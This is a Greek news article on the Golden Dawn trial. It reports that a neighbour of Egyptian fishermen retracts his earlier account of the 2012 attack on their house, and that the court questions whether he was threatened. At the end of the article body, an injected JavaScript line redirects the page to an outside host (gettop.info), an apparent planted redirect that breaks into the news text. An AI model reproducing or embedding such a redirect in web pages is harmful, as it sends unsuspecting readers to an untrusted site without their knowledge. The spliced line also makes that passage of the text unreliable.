Δίκη Χ.Α: Αλλάζει την κατάθεσή του ο γείτονας των Αιγύπτιων ψαράδων

0
4

 

Ανέτρεψε πλήρως την κατάθεσή του για την επίθεση στο σπίτι των Αιγύπτιων ψαράδων ο γείτονάς τους καταθέτοντας στη δίκη της Χρυσής Αυγής λέγοντας: «Τα παραείπα τότε, δεν ήταν χρυσαυγίτες, ήταν κάτι πιτσιρικάδες που κουνούσαν ένα αυτοκίνητο». Μάλιστα, η πρόεδρος απόρησε τόσο ώστε να τον ρωτήσει και το όνομά του: «Εσείς δεν είστε ο Κωνσταντίνος Τατσιόπουλος;».

Ο μάρτυρας μετέφερε μία εντελώς διαφορετική εικόνα στο δικαστήριο από αυτήν που είχε δώσει σε προηγούμενες καταθέσεις του για την επίθεση στο σπίτι των Αιγύπτιων γειτόνων του, στις 12 Ιουνίου 2012.

Η πρόεδρος, δείχνοντάς του την υπογραφή του στο τέλος των καταθέσεων του, τον ρώτησε αν είναι δική του και η εισαγγελέας τον ρώτησε αν έχει απειληθεί.

Ο κ. Τατσιόπουλος κατέθεσε πως «δεν ήταν και ακριβώς 40 άτομα, με λοστούς και ρόπαλα, που φεύγουν με συντονισμένες κινήσεις», όπως είχε πει αρχικά, αλλά τελικά ήταν «10 πιτσιρικάδες, περίπου 22 ετών, που κουνούσαν το βαν των ψαράδων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here